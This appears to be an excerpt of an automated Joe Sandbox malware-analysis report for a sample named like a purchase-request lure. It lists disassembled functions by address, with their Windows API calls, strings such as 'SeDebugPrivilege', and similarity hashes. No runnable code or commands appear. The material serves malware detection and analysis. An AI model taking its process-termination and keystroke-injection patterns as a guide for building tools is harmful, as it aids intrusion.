VariantInit.OLEAUT32(?), ref: 00479238
VariantInit.OLEAUT32(?), ref: 00479339
VariantClear.OLEAUT32(?), ref: 00479343
VariantClear.OLEAUT32(?), ref: 004793A0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 0047931C
,,I, xrefs: 004791E5
Null Object assignment in FOR..IN loop, xrefs: 004791C8, 004792F6, 004793AE

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: ,,I$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-2080382077
Opcode ID: 5e45a4bc97ccb967f3a94fe0c7eba0d1116f12234079cc91aabcb7686965c87b
Instruction ID: ae80b45066e4f78fbd037e562a23a34cf658a5e22d7790f01f39a3ab0041c2b1
Opcode Fuzzy Hash: 5e45a4bc97ccb967f3a94fe0c7eba0d1116f12234079cc91aabcb7686965c87b
Instruction Fuzzy Hash: 62919E30A00205ABDF20DFA1C848FEFB7B8EF49714F10855EE909AB281D7789D05CBA4

Function 0045A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0045A439), ref: 0045A377

Strings

NAME, xrefs: 0045A1A9
CLASS, xrefs: 0045A0F6
INSTANCE, xrefs: 0045A285
REGEXPCLASS, xrefs: 0045A13C
TEXT, xrefs: 0045A2AE
CLASSNN, xrefs: 0045A119

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 1424eacf5de64af2c769219169cfdcdf02d038a0872950fffdd1f519614ed5ca
Instruction ID: 7454df241f77d0b93e78cd2df6a08ba454d4c5e8e9c0a671585cc9aba64ec447
Opcode Fuzzy Hash: 1424eacf5de64af2c769219169cfdcdf02d038a0872950fffdd1f519614ed5ca
Instruction Fuzzy Hash: BA91BB70600505AADB08DF61C452BEEF774BF04305F54822FEC59A7242DB3969ADCB99

Function 00402E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00402EAE

Part of subcall function 00401DB3: GetClientRect.USER32(?,?), ref: 00401DDC
Part of subcall function 00401DB3: GetWindowRect.USER32(?,?), ref: 00401E1D
Part of subcall function 00401DB3: ScreenToClient.USER32(?,?), ref: 00401E45

GetDC.USER32 ref: 0043CD32
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0043CD45
SelectObject.GDI32(00000000,00000000), ref: 0043CD53
SelectObject.GDI32(00000000,00000000), ref: 0043CD68
ReleaseDC.USER32(?,00000000), ref: 0043CD70
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0043CDFB

Strings

U, xrefs: 0043CCD0

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
Instruction ID: a06c30b2c7428a2a0e02ce49fef1101dc5652c1e0a779c9989b3b0b616dc9c80
Opcode Fuzzy Hash: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
Instruction Fuzzy Hash: 8A71CB31400205DFCF219F64C884AAB3BB5FF48324F14567BFD55AA2A6C7389881DBA9

Function 00478C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,0048F910), ref: 00478D28
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0048F910), ref: 00478D5C
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00478ED6
SysFreeString.OLEAUT32(?), ref: 00478F00

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
Instruction ID: 5de9ffb64ca5e15a2b50b30bc9937a924b2564530b5861c8322637ebb6f06415
Opcode Fuzzy Hash: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
Instruction Fuzzy Hash: A4F12871A00109AFCB14DF94C888EEEB7B9FF49314F10846AF909AB251DB35AE46CB55

Function 0047F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0047F6B5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0047F848
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0047F86C
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0047F8AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0047F8CE
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0047FA4A
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0047FA7C
CloseHandle.KERNEL32(?), ref: 0047FAAB
CloseHandle.KERNEL32(?), ref: 0047FB22

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 09089f4999dafd9f94918a190b4690ca7b3ee09c0fd1a425bef097705c52c433
Instruction ID: 06b6fb47819207378a011b81351d7d70f99dbcb89b467e7706fbe8a6ff9703be
Opcode Fuzzy Hash: 09089f4999dafd9f94918a190b4690ca7b3ee09c0fd1a425bef097705c52c433
Instruction Fuzzy Hash: D8E194716042009FC714EF25C451BAA7BE1BF85314F14856EF8999B3A2DB38EC49CB5A

Function 00464CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00463697,?), ref: 0046468B

Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00463697,?), ref: 004646A4

Part of subcall function 00464A31: GetFileAttributesW.KERNEL32(?,0046370B), ref: 00464A32

lstrcmpiW.KERNEL32(?,?), ref: 00464D40
_wcscmp.LIBCMT ref: 00464D5A
MoveFileW.KERNEL32(?,?), ref: 00464D75

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 9f483328b87e2f9089392b2207326b9a11b8e00c1f4561b81bc0a43578ca8f4b
Instruction ID: 3e0d64ecfe06201b2d7f4e4ce82b19db3d94e317acadfd9fd6841a38a6d3c077
Opcode Fuzzy Hash: 9f483328b87e2f9089392b2207326b9a11b8e00c1f4561b81bc0a43578ca8f4b
Instruction Fuzzy Hash: 1D5164B25083459BCB24EFA1D8819DF73ECAF84354F40092FB289D3151EE79A589C76B

Function 00488645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004886FF

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
Instruction ID: 67c69bdd2abc2e43d0d58bc2ecba6baab6695951e18c15bee5b3ec72a7eaee37
Opcode Fuzzy Hash: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
Instruction Fuzzy Hash: BE519530500244BEDB20BB298C89F5E7B64EB05724FA0492FF911E62E1DF79A990DB5D

Function 00402B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0043C2F7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0043C319
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0043C331
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0043C34F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0043C370
DestroyIcon.USER32(00000000), ref: 0043C37F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0043C39C
DestroyIcon.USER32(?), ref: 0043C3AB

Part of subcall function 0048A4AF: DeleteObject.GDI32(00000000), ref: 0048A4E8

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
Instruction ID: 8b5e312d24aa0fc7293d55633b028b71e285ae3fa30838bdc618f7a4141ee9b3
Opcode Fuzzy Hash: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
Instruction Fuzzy Hash: 9D516A74A00205AFDB20DF65CD85FAF3BB5EB58310F10452EF902A72D0D7B4A991DB68

Function 0045966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0045A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0045A84C
Part of subcall function 0045A82C: GetCurrentThreadId.KERNEL32 ref: 0045A853
Part of subcall function 0045A82C: AttachThreadInput.USER32(00000000,?,00459683,?,00000001), ref: 0045A85A

MapVirtualKeyW.USER32(00000025,00000000), ref: 0045968E
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 004596AB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 004596AE
MapVirtualKeyW.USER32(00000025,00000000), ref: 004596B7
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 004596D5
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004596D8
MapVirtualKeyW.USER32(00000025,00000000), ref: 004596E1
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 004596F8
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004596FB

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 97659e6d0eeaf490ac976d3d5fe311f7ccd298156506907ffd454ad2a564656a
Instruction ID: 1862abde6b5ba1d27f2b77b23e96e8fddf5d6721de8ccd0207d4cd72f070cce3
Opcode Fuzzy Hash: 97659e6d0eeaf490ac976d3d5fe311f7ccd298156506907ffd454ad2a564656a
Instruction Fuzzy Hash: F011E571910618BEF6106F61DC49F6E3B1DDB4C755F100939F644AB0A1CAF25C15DBA8

Function 00458921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0045853C,00000B00,?,?), ref: 0045892A
HeapAlloc.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458931
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458946
GetCurrentProcess.KERNEL32(?,00000000,?,0045853C,00000B00,?,?), ref: 0045894E
DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458951
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458961
GetCurrentProcess.KERNEL32(0045853C,00000000,?,0045853C,00000B00,?,?), ref: 00458969
DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 0045896C
CreateThread.KERNEL32(00000000,00000000,00458992,00000000,00000000,00000000), ref: 00458986

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
Instruction ID: 349ed70c1d76ccaf0bdfd0abb61d7988567b7a63eab8a905bd57cb3f4c4245c0
Opcode Fuzzy Hash: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
Instruction Fuzzy Hash: 4801BBB5240308FFE710ABA5DC8DF6B7BACEB89711F508825FA05DB1A1CA759C14CB24

Function 0047975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 0045710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?,?,00457455), ref: 00457127
Part of subcall function 0045710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457142
Part of subcall function 0045710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457150
Part of subcall function 0045710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?), ref: 00457160

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00479806
_memset.LIBCMT ref: 00479813
_memset.LIBCMT ref: 00479956
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00479982
CoTaskMemFree.OLE32(?), ref: 0047998D

Strings

NULL Pointer assignment, xrefs: 004799DB

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 45d3d11671b48f4c91a0fa55736b5ede04149e8acd56d59b25060feee5a3bfa2
Instruction ID: 344d97a8cecc5579365d94fc52d7d4a9bdae2fe77cb17e56d270d326fab8ac0d
Opcode Fuzzy Hash: 45d3d11671b48f4c91a0fa55736b5ede04149e8acd56d59b25060feee5a3bfa2
Instruction Fuzzy Hash: BD915CB1D00218EBDB10DFA5DC81EDEBBB9EF08314F10806AF519A7291EB755A44CFA5

Function 00486D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00486E24
SendMessageW.USER32(?,00001036,00000000,?), ref: 00486E38
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00486E52
_wcscat.LIBCMT ref: 00486EAD
SendMessageW.USER32(?,00001057,00000000,?), ref: 00486EC4
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00486EF2

Strings

SysListView32, xrefs: 00486DF6

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
Instruction ID: cb01a20e413fb831c79b84d4e1a22deaf7a16da1e784ee9815b65cba95e2bd2f
Opcode Fuzzy Hash: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
Instruction Fuzzy Hash: 6341A370A00308ABDB21AF64CC85BEF77F8EF08354F11082BF544A7291D6799D858B68

Function 0047E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00463C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00463C7A
Part of subcall function 00463C55: Process32FirstW.KERNEL32(00000000,?), ref: 00463C88
Part of subcall function 00463C55: CloseHandle.KERNEL32(00000000), ref: 00463D52

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9A4
GetLastError.KERNEL32 ref: 0047E9B7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9E6
TerminateProcess.KERNEL32(00000000,00000000), ref: 0047EA63
GetLastError.KERNEL32(00000000), ref: 0047EA6E
CloseHandle.KERNEL32(00000000), ref: 0047EAA3

Strings

SeDebugPrivilege, xrefs: 0047E9C2

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
Instruction ID: ee7027a858fb35c2998370541a0cb7821fbd3e1ab4d9769570fd7f32c35e06b7
Opcode Fuzzy Hash: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
Instruction Fuzzy Hash: E1419D712002009FDB10EF25DC95BAEB7A5AF44318F04856EF9069B3C2DB78AC09CB99

Function 00462F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00463033

Strings

question, xrefs: 00462FEC
warning, xrefs: 0046301C
info, xrefs: 00462FD4
blank, xrefs: 00462FB5
stop, xrefs: 00463004

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
